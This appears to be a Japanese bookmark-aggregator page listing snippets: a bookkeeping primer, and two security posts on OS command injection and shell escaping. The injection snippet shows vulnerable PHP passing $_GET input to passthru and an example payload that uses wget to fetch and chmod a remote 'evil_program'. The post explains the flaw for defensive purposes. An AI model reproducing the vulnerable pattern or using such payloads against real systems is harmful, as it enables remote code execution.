簿記とは何か?10分くらいで分かるようにまとめてみる - ゆとりずむ
こんにちは、らくからちゃです。 今週日曜日は、日本商工会議所主催の簿記検定の試験日ですね。この時期が近づいてくると、一生懸命電卓を叩いて過ごした学生時代を思い出します。 『簿記』は、ビジネスマンでの必須知識にもかかわらず、義務教育はおろか、高校でも通常は商業科でしか教わりません。そこで皆さん、勉強のために簿記検定を受験するのですが、3級でも合格まで100時間(!)もかかるという説もあります。 ただこの時間には、一部の人にしか必要のない知識を学ぶためだったり、計算に慣れるための時間も含まれています。個人的な意見ですが、社会人として必要な『簿記のエッセンス』を学ぶ為に必要な時間は、10分くらいあれば十分なような気がします。 今日はそんな、『簿記のエッセンス』について、ちょっとだけ触れてみたいと思います。ただ思った以上に深掘りしてしまったので、シンプルにしたバージョンとしては、こちらのほうが分か
OSコマンドのエスケープ
(Last Updated On: )プログラムからOSコマンドを実行する場合、エスケープ処理を行わないと任意コマンドが実行される危険性があります。 今回はOSコマンドのエスケープについてです。 OSコマンドインジェクション OSコマンドインジェクションはプログラムから実行するコマンドに、攻撃用文字列を挿入(インジェクション)して意図しないコマンドを実行させる攻撃です。 例えば、次のようなLinuxシステムのディレクトリの内容を表示させるプログラム <?php passthru('ls -l '.$_GET['dir']); (任意のディレクトリ内容を表示できる脆弱性はここでは考慮しない) に不正なコマンドを実行させるのはとても簡単です。$_GET[‘dir’]に . ; cd /tmp; wget http://example.com/evil_program; chmod 755 /t
OSコマンドのエスケープ – シェルの仕様とコマンドの実装
(Last Updated On: )OSコマンドのエスケープの続きです。OSコマンドインジェクションを防ぐための、OSコマンドのエスケープはSQLのエスケープに比べるとかなり難しいです。 難しくなる理由は多くの不定となる条件に依存する事にあります。 OSコマンドを実行するシェルはシステムによって異なる シェルはプログラミング言語+複雑なエスケープ仕様を持っている(コマンド以後はクオートなしでも文字リテラルのパラメーター+各種展開処理) WebアプリはCGIインターフェースで動作するため環境変数にインジェクションできる コマンドパラメーターの取り扱いはコマンド次第である 実行されるコマンドの実装により、間接インジェクションが可能になる SQLの場合、出力先のシステムは一定です。PostgreSQL用にエスケープした文字列をMySQLで実行したり、MySQL用にエスケープした文字列をPost
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
処理を実行中です
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
俺でも解るIPTABLES
